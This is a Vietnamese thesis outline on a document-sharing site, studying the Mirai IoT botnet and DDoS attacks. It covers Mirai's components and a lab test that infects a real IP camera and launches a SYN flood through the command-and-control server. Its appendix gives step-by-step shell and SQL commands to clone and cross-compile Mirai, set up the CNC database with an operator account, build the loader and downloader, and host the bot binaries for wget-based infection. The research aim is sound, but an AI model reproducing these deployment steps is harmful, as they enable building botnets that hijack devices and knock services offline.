1. Trang chủ
  2. » Luận Văn - Báo Cáo

Đề cương đồ án tốt nghiệp: Nghiên cứu tấn công DDOS với Botnet Mirai trên các thiết bị Internet of things ( IoT )

59 215 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 59
Dung lượng 2,68 MB

Nội dung

Mục tiêu của đồ án: Xây dựng hệ thống botnet, nghiên cứu cách thức hoạt động của hệ thống botnet, tìm hiểu một số kỹ thuật coding thú vị trong mã nguồn, lây nhiễm mã độc lên thiết bị thật và thực nghiệm tấn công DDoS, nghiên cứu phát triển những hạn chế của mã nguồn. Mời các bạn cùng tham khảo.

BAN CƠ YẾU CHÍNH PHỦ HỌC VIỆN KỸ THUẬT MẬT MÃ ˉˉˉˉˉˉˉˉˉˉˉˉˉˉˉˉ ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU TẤN CƠNG DDOS VỚI BOTNET MIRAI  TRÊN CÁC THIẾT BỊ INTERNET OF THINGS ( IoT ) Ngành: Cơng nghệ thơng tin Chun ngành: An tồn thơng tin Mã số: 52.48.02.01 Hà Nội, 2017 BAN CƠ YẾU CHÍNH PHỦ HỌC VIỆN KỸ THUẬT MẬT MÃ ˉˉˉˉˉˉˉˉˉˉˉˉˉˉˉˉ ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU TẤN CƠNG DDOS VỚI BOTNET MIRAI  TRÊN CÁC THIẾT BỊ INTERNET OF THINGS ( IoT ) Ngành: Cơng nghệ thơng tin Chun ngành: An tồn thơng tin Mã số: 52.48.02.01 Sinh viên thực hiện: Nguyễn Thế Đạt Lớp: AT9A Người hướng dẫn : KS. Nguyễn Mạnh Thắng Khoa An tồn thơng tin – Học viện Kỹ thuật mật mã                                    Mọi đóng góp trao đổi liên hệ:                  SĐT: 01699960595 hoặc 0949423894. Mail: datnt2308@gmail.com Hà Nội, 2017 MỤC LỤC   Danh mục kí hiệu và viết tắt                                                                          5   Danh mục hình vẽ                                                                                            6   Danh mục bảng                                                                                                 8   Lời nói đầu                                                                                                        9  Chương 1. Tổng quan về internet of things                                                  11  1.1. Lịch sử hình thành và phát triển Internet                                                    11  1.2. Giới thiệt về Internet of Things                                                                  12  Chương 2. Tổng quan về tấn công từ chối dịch vụ ddos                          16  2.1. Tổng quan về an ninh mạng                                                                       16  2.2. Tổng quan về tấn công từ chối dịch vụ                                                     16  Chương 3. Nghiên cứu về mã nguồn botnet mirai                                      19  3.1. Giới thiệu về Botnet Mirai                                                                          19  3.2. Phân tích các thành phần của Botnet Mirai                                                 22 Chương 4. Triển khai thực nghiệm botnet mirai trÊn cÁc thiết bị   iot                                                                                                                         37  4.1. Mô tả thực nghiệm                                                                                      37  4.2. Thử nghiệm tấn công                                                                                  37   Kết luận                                                                                                            51   Tài liệu tham khảo                                                                                          52   Phụ lục                                                                                                              53 DANH MỤC KÍ HIỆU VÀ VIẾT TẮT || Hoặc & Và Admin Administrator ARPANET Advanced Research Projects Agency Network CNC Command And Control DDoS Distributed Denial of Service IP Internet Protocol IoT Internet of Things LAN Local Area Metwork NII National Information Infrastructure NSF National Science Foundation MILNET Military Network TCP/IP Transmission Control Protocol/Internet Protocol DANH MỤC HÌNH VẼ Hình 1.1. Xu hướng phát triển IoT 12 Hình 3.2. Mirai sử  dụng 5 user­agent khác nhau (mirai/bot/table.h) .20 Hình   3.3.  Mirai   sử  dụng  10  kỹ   thuật   tấn  công  từ   chối  dịch  vụ  (mirai/bot/attack.h) .20 Hình 3.4. Mơ hình hoạt động logic của các thành phần 21 Hình 3.5. Cấu trúc thư mục mã nguồn .21 Hình 3.6. CNC lắng nghe kết nối (mirai/cnc/main.go) 23 Hình   3.7   CNC   nhận     thông   tin     bot     admin  (mirai/cnc/main.go) .24 Hình 3.8. Nhập username từ cmd .24 Hình 3.9. Nhập password từ cmd 24 Hình 3.10. Nhập password từ cmd 25 Hình 3.11. Thơng báo đăng nhập thành cơng 25 Hình 3.12. Kiểm tra số lượng Bot connect tới CNC 25 Hình 3.13. Thêm và cấu hình cho tài khoản mới 26 Hình 3.14. Hàm AttackInfoLookup .27 Hình 3.15. Thiết lập network card cho report server (loader/main.c) .27 Hình 3.16. Khởi tạo server chứa mã độc (loader/main.c) .28 Hình 3.17. Nhận ip, port, user, pass từ STDIN (loader/main.c) 28 Hình 3.18. Sử dụng busybox login và lây mã độc (loader/server.c) 31 Hình 3.19. Lắng nghe kết nối trên cổng 48101 (scanListen.go) .31 Hình   3.20   Hiển   thị   thông   tin   thiết   bị   bruteforce   được  (scanListen.go) .32 Hình 3.21. Che dấu tiến trình (mirai/bot/main.c) .33 Hình 3.22. Các phương thức tấn cơng (mirai/bot/attack.c) .34 Hình 3.23. Kill các cổng dịch vụ (mirai/bot/killer.c) 34 Hình 3.24. Ngăn cản thiết bị reboot lại (mirai/bot/main.c) .35   Hình   3.25   Tài   khoản   dùng   để   bruteforce   IoT     (mirai/bot/scanner.c) .35 Hình 3.26. Địa chỉ bruteforce thiết bị IoT mới (mirai/bot/scanner.c) .35 Hình   3.27   Bot   gửi   thông   tin     IoT       bruteforce  (mirai/bot/scanner.c) .36 Hình 3.28. Khai báo domain và port các server (mirai/bot/table.c) 36 Hình 4.29. Khởi chạy CNC Server .38 Hình 4.30. Cài đặt thơng tin của Database (cnc\main.c) 39 Hình 4.31. CNC đăng nhập Database (cnc\database.go) 39 Hình 4.32. Khởi chạy scanListen 39 Hình 4.33. Mở port 48101 chờ kết quả từ Bot 40 Hình 4.34. Nhập Bot cho Loader 40 Hình 4.35. Loader kết nối thiết bị IoT lây nhiễm Malware 41 Hình 4.36. Loader thực hiện lây lan Malware 41 Hình 4.37. Attacker telnet tới CNC .42 Hình 4.38. Attacker đăng nhập CNC 43 Hình   4.39   Kiểm   tra   kết   nối   tới   cổng   23     Bot   hay   Admin  (cnc/main.go) 44 Hình 4.40. Loader hiển thị Bot kết nối thành cơng 45 Hình 4.41. Thơng tin Bot scan thiết bị khác 46 Hình 4.42. Thơng tin thiết bị mà Bot bruteforce thành cơng 47 Hình 4.43. Nhập lệnh tấn cơng 47 Hình 4.44. Lệnh hacker dùng tấn cơng 48 Hình 4.45. Thiết bị IoT là IP Camera bị chiếm quyền kiểm sốt 50 Hình 4.46. Victim bị Attacker tấn cơng khiến lưu lượng tăng cao 50 DANH MỤC BẢNG Bảng 1. Thành phần thực nghiệm .37 LỜI NĨI ĐẦU Internet of Things là cụm từ nhằm để  chỉ  các đối tượng có thể  được nhận  biết cũng như sự tồn tại của chúng và được Kenvin Ashton đưa ra năm 1999. Cho   đến nay, mạng lưới vạn vật kết nối Internet là một kịch bản của thế  giới hiện  đại khi mà mỗi đồ  vật, con người được cung cấp một định danh riêng và tất cả  đều có khả năng truyền tải, trao đổi thơng tin qua mạng mà khơng cần tương tác   trực tiếp giữa người với người hay người với máy tính. Tóm lại, IoT là một tập   hợp các thiết bị  có khả  năng kết nối với nhau, với Internet và với thế  giới bên  ngồi để thực hiện một cơng việc nào đó Trong bối cảnh IoT bùng nổ  như  là một xu hướng mới trong tương lai đi   kèm với những tiện ích thì cũng tiềm  ẩn những mối nguy hại và trở  thành mục  tiêu hàng đầu của giới Hacker hiện đại. IoT có thể  gây  ảnh hưởng xấu nếu các  thiết bị  bảo mật kém có thể  bị  nhiễm mã độc và trở  thành một zombie trong   mạng botnet. Khi hacker điều khiển một lượng lớn thiết bị  IoT sẽ  dễ  dàng tấn  cơng DDoS đánh sập bất cứ thứ gì trên Internet với lượng dữ liệu khổng lồ Cuối năm 2016, mã nguồn Mirai đã được cơng bố  gây ra  ảnh hướng lớn   kèm theo vơ vàn mối lo và cũng là lời cảnh báo với các sản phẩm IoT trong tương   lai. Vì vậy đề  tài được chọn khi thực hiện đồ  án tốt nghiệp này là "Nghiên cứu   tấn cơng DDoS với botnet Mirai trên các thiết bị Internet of Things (IoT)" Đồ án được thực hiện nhằm mục đích nghiên cứu cách thức hoạt động và  mối nguy hiểm của mã nguồn botnet Mirai trên thiết bị  IoT để  từ  đó đưa ra các   giải pháp phòng chống Mục tiêu đặt ra khi thực hiện đồ án là: Xây dựng hệ thống botnet Nghiên cứu cách thức hoạt động của hệ thống botnet Tìm hiểu một số kỹ thuật coding thú vị trong mã nguồn Lây nhiễm mã độc lên thiết bị thật và thực nghiệm tấn cơng DDoS.  Nghiên cứu phát triển những hạn chế của mã nguồn Sau thời gian khoảng bốn tháng thực hiện đồ án, các mục tiêu về cơ bản đã  đạt được. Tuy nhiên tấn cơng DDoS IoT là lĩnh vực khoa học phức tạp, thời gian   thực hiện đồ  án tương đối ngắn nên chắc chắn khơng tránh khỏi thiếu sót. Rất  mong được sự  góp ý của các thầy cơ, cũng như  các bạn học viên để  đồ  án này  được hồn thiện hơn 10 Hình 4.40. Loader hiển thị Bot kết nối thành cơng Như  vậy Bot có IP 61.222.7.176, port 23, tài khoản admin/1111, kiến trúc  arm7 Và đặc biệt Bot có tiện ích Busybox và có thể  sử  dụng lệnh Wget. Wget   như đã nói từ trước giúp thiết bị tải Malware từ Wget Server Bot: 45 Hình 4.41. Thơng tin Bot scan thiết bị khác Ngay sau khi lây nhiễm Malware vào thiết bị thì Bot sẽ:  Tự  kill các tiến trình đang mở  port 23 trên Bot nhằm khơng cho bất  kỳ ai có thể truy cập vào thiết bị qua port 23  Phân giải tên miền CNC  Kết nối tới CNC  Tự động bruteforce thiết bị khác và đồng thời giữ kết nối với CNC  Gửi kết quả cho Report Server Report Server: 46 Hình 4.42. Thơng tin thiết bị mà Bot bruteforce thành cơng Hiển thị thơng tin về thiết bị mà Bot bruteforce thành cơng Lưu ý: trong Source code Mirai, Bot chỉ  dừng   mức bruteforce mà chưa  kiểm tra các điều kiện để lây Malware trên thiết bị nên việc này hồn tồn khơng   có nghĩa thiết bị phù hợp để lây Bot. Loader server mới là nơi kiểm tra điều kiện  và lây Malware chứ khơng phải scanListen. Cần phân biệt điều này, đây mới chỉ  là điều kiện cần nhưng chưa đủ Bước 6. Attacker tấn cơng Victim Bước 6 có 3 nhiệm vụ: Hiển thị thơng tin về user đăng nhập và số lượng Bot có thể attack Nhập lệnh attack Gửi lệnh tới CNC Nhập lệnh tấn cơng theo định dạng :    [Flags] Ví dụ: syn 203.162.130.66 30 psh==1 syn 203.162.130.66 3600 ack==1 Hình 4.43. Nhập lệnh tấn cơng 47 Lệnh sẽ được Attacker gửi sẽ được gửi như sau:  Attacker nhập lệnh tấn cơng qua CMD ­> CNC ­> Bot ­> Victim Hình 4.44. Lệnh hacker dùng tấn cơng IP Attacker: 14.177.140.96 IP CNC: 203.162.130.69 IP Victim: 203.162.130.87 Command: syn 203.162.130.87 20 psh==1 Attacker tấn cơng Victim bằng Syn Flood và có cả  Flag Push trong vòng  20s 48 Bước 7. Kiểm tra kết quả 49 Hình 4.45. Thiết bị IoT là IP Camera bị chiếm quyền kiểm sốt Hình 4.46. Victim bị Attacker tấn cơng khiến lưu lượng tăng cao Bot liên tục gửi gói tin tấn cơng Victim trong vòng 20s. Tuy nhiên, số lượng  gói tin Victim phải hứng chịu rất lớn 50 KẾT LUẬN Bốn chương của đồ  án đã thể  hiện được rằng những mục tiêu đặt ra khi   thực hiện đồ án đều đã đạt được. Cụ thể: Chương 1 đã giới thiệu được tổng quan về Internet of Things. Chương này  cũng đã chỉ ra rằng với xu hướng và những ứng dụng thực tiễn của IoT ln tồn  tại những mối nguy hiểm tiềm  ẩn. Trong đó, mối nguy hiểm lớn và đang hot   nhất là Botnet IoT Chương 2 nối tiếp chương một nói cụ  thể  hơn về  sự  nguy hiểm của tấn   cơng từ chối dịch vụ và xu hướng sử dụng Botnet IoT vào tấn cơng DDoS đang là   kim chỉ nam cho các cuộc tấn cơng mạng mà hacker đương đại đang nhắm đến Chương 3 lần lượt xem xét các thành phần và cấu trúc của mã nguồn Mirai   Đồng thời cụ thể hóa các kỹ thuật và ý tưởng xây dựng Botnet Mirai của tác giả  thơng qua sự phân tích các đoạn mã. Theo đó, sự phân tích đã chỉ ra những nhược   điểm còn thiếu sót trong mã nguồn. Những nhược điểm được lộ  rõ đã được em  triển khai khắc phục Trong chương 4, thực nghiệm đã mơ tả  q trình xây dựng thực tế trên hệ  thống và những thiết bị thật. Mơ hình triển khai đã cụ thể hóa các thành phần mã  nguồn, cách chúng kết hợp và tương tác. Từ đó, ai cũng có thể hiểu rõ hơn về hệ  thống Botnet Mirai nói riêng và hệ thống Botnet trên thế giới nói chung Dù vậy, vẫn còn một số vấn đề liên quan. Trước hết, đồ án này mới chỉ đề  cập đến việc sử dụng bruteforce mà chưa đi sâu vào việc ứng dụng lỗ hổng zero­ day, CVE đã được cơng bố  để  khai thác thiết bị  IoT do chưa đủ  thời gian để  nghiên cứu thêm. Mã nguồn của tác giả  có một số  thiếu sót trong việc biên dịch  sang x86 dẫn đến lỗi khi chạy trên nền tảng này. Dù em đã cố gắng chỉnh sửa và  biên dịch lại nhưng chưa thành cơng. Việc giải quyết những điểm tồn tại này  cũng chính là hướng phát triển tương lai của đồ án 51 TÀI LIỆU THAM KHẢO [1] GSM Accociation, IoT Security Guidelines Overview Document Version 1.1,  November 07, 2016 [2] Mirai DDoS Botnet: Source Code & Binary Analysis, http://www.simonroses.com/2016/10/mirai­ddos­botnet­source­code­binary­ analysis/ [3] Octave Klaba, This botnet with 145607 cameras/dvr (1­30Mbps per IP) is able  to send >1.5Tbps DDoS. Type: tcp/ack, tcp/ack+psh, tcp/syn.“ [4] Brian Krebs; Krebs on Security, 1.10.2016: „Source Code for IoT Botnet  ‘Mirai’ Released“: https://krebsonsecurity.com/2016/10/source­code­for­iot­ botnet­mirai­released/ [5] Word’s Largest Net: Mirai Botnet, https://hackforums.net/showthread.php? tid=5420472 52 PHỤ LỤC Các bước cài đặt hệ thống Botnet Mirai: #Update Sources.list in /etc/apt/sources.list deb http://http.kali.org/kali kali­rolling main contrib non­free deb­src http://http.kali.org/kali kali­rolling main contrib non­free deb http://old.kali.org/kali sana main non­free contrib deb­src http://old.kali.org/kali sana main non­free contrib #Update Repo apt­get update #Requirements apt­get install gcc golang electric­fence mysql­server mysql­client #Git Clone Mirai Source Code cd /home/mirai mkdir ddos/ cd ddos/ apt­get install git git clone https://github.com/jgamblin/Mirai­Source­Code.git cd Mirai­Source­Code/mirai export PATH=$PATH:/usr/local/go/bin export GOPATH=/home/mirai/go go get github.com/go­sql­driver/mysql go get github.com/mattn/go­shellwords mkdir /etc/xcompile cd /etc/xcompile wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross­compiler­ armv4l.tar.bz2 wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross­compiler­ armv5l.tar.bz2 53 wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross­compiler­ armv6l.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross­compiler­ i586.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross­compiler­ m68k.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross­compiler­ mips.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross­compiler­ mipsel.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross­compiler­ powerpc.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross­compiler­ sh4.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross­compiler­ sparc.tar.bz2   tar ­jxf cross­compiler­armv4l.tar.bz2 tar ­jxf cross­compiler­armv5l.tar.bz2 tar ­jxf cross­compiler­armv6l.tar.bz2 tar ­jxf cross­compiler­i586.tar.bz2 tar ­jxf cross­compiler­m68k.tar.bz2 tar ­jxf cross­compiler­mips.tar.bz2 tar ­jxf cross­compiler­mipsel.tar.bz2 tar ­jxf cross­compiler­powerpc.tar.bz2 tar ­jxf cross­compiler­sh4.tar.bz2 tar ­jxf cross­compiler­sparc.tar.bz2   rm *.tar.bz2 mv cross­compiler­armv4l armv4l mv cross­compiler­armv5l armv5l mv cross­compiler­armv6l armv6l mv cross­compiler­i586 i586 54 mv cross­compiler­m68k m68k mv cross­compiler­mips mips mv cross­compiler­mipsel mipsel mv cross­compiler­powerpc powerpc mv cross­compiler­sh4 sh4 mv cross­compiler­sparc sparc # PUT THESE COMMANDS IN THE FILE ~/.bashrc # Cross compiler toolchains export PATH=$PATH:/etc/xcompile/armv4l/bin export PATH=$PATH:/etc/xcompile/armv5l/bin export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc­440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin   # Golang export PATH=$PATH:/usr/local/go/bin export GOPATH=/home/mirai/go cd /home/mirai/ddos/Mirai­Source­Code/mirai /build.sh debug telnet /build.sh debug telnet /debug/enc string  edit file bot/table.c vi bot/table.c service mysql start 55 mysql ­u root  CREATE DATABASE mirai; use mirai; CREATE TABLE `history` (   `id` int(10) unsigned NOT NULL AUTO_INCREMENT,   `user_id` int(10) unsigned NOT NULL,   `time_sent` int(10) unsigned NOT NULL,   `duration` int(10) unsigned NOT NULL,   `command` text NOT NULL,   `max_bots` int(11) DEFAULT '­1',   PRIMARY KEY (`id`),   KEY `user_id` (`user_id`) ); CREATE TABLE `users` (   `id` int(10) unsigned NOT NULL AUTO_INCREMENT,   `username` varchar(32) NOT NULL,   `password` varchar(32) NOT NULL,   `duration_limit` int(10) unsigned DEFAULT NULL,   `cooldown` int(10) unsigned NOT NULL,   `wrc` int(10) unsigned DEFAULT NULL,   `last_paid` int(10) unsigned NOT NULL,   `max_bots` int(11) DEFAULT '­1',   `admin` int(10) unsigned DEFAULT '0',   `intvl` int(10) unsigned DEFAULT '30',   `api_key` text,   PRIMARY KEY (`id`),   KEY `username` (`username`) ); CREATE TABLE `whitelist` (   `id` int(10) unsigned NOT NULL AUTO_INCREMENT,   `prefix` varchar(16) DEFAULT NULL,   `netmask` tinyint(3) unsigned DEFAULT NULL,   PRIMARY KEY (`id`), 56   KEY `prefix` (`prefix`) ); exit mysqladmin ­u root password root mysql ­u root ­p //dang nhap password mysql : root GRANT ALL ON mirai.* TO 'root'@'127.0.0.1'; GRANT ALL ON mirai.* TO 'root'@'localhost'; use mirai; INSERT INTO users VALUES (NULL, 'hacker', 'hacker', 0, 0, 0, 0, ­1, 1, 30, ''); exit cd cnc/ leafpad main.go password database : root port 3306 cd  copy file prom.pt vao cnc export PATH=$PATH:/etc/xcompile/armv4l/bin export PATH=$PATH:/etc/xcompile/armv5l/bin export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc­440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin   # Golang export PATH=$PATH:/usr/local/go/bin export GOPATH=/home/mirai/go go get github.com/go­sql­driver/mysql 57 go get github.com/mattn/go­shellwords /build.sh debug telnet /build.sh release telnet #dlr cd /home/mirai/ddos/Mirai­Source­Code/dlr edit main.c => IP HTTP Server comment ./build.sh: line 3: i686­gcc: command not found /build.sh: line 16: i686­strip: command not found #DLR build # apt­get update && apt­get upgrade apt­get install build­essential  Replace i686­gcc with gcc, i686­strip with strip and try again /build.sh copy dlr vao bin cua loader chmod 777 build.sh export PATH=$PATH:/etc/xcompile/armv4l/bin export PATH=$PATH:/etc/xcompile/armv5l/bin export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc­440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin /build.sh cd release/ cp *  / /loader/bins/ cd  / /loader/src/ 58 leafpad main.c #edit tftp,wget,bind address cd  /build.debug.sh /build.sh mkdir /var/www/html/bins cd /home/mirai/ddos/Mirai­Source­Code/mirai/ cp ­R release/mirai.* /var/www/html/bins cp ­R release/miraint.* /var/www/html/bins cp prompt.txt release/ cd release/ /cnc 59 ... lai. Vì vậy đề  tài được chọn khi thực hiện đồ án tốt nghiệp này là  "Nghiên cứu   tấn cơng DDoS với botnet Mirai trên các thiết bị Internet of Things (IoT) " Đồ án được thực hiện nhằm mục đích nghiên cứu cách thức hoạt động và ... HỌC VIỆN KỸ THUẬT MẬT MÃ ˉˉˉˉˉˉˉˉˉˉˉˉˉˉˉˉ ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP NGHIÊN CỨU TẤN CƠNG DDOS VỚI BOTNET MIRAI TRÊN CÁC THIẾT BỊ INTERNET OF THINGS ( IoT ) Ngành: Cơng nghệ thơng tin Chun ngành: An tồn thơng tin...  điều khiển các máy tính mà  hướng đến các thiết bị IoT (Internet of Things) Mirai thực hiện rà qt dải mạng IPv4 nhằm tìm kiếm các thiết bị IoT.  Để  tối ưu hóa hiệu năng rà qt của mình thì Mirai thực hiện loại bỏ các dải IP như 

Ngày đăng: 12/01/2020, 00:21

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w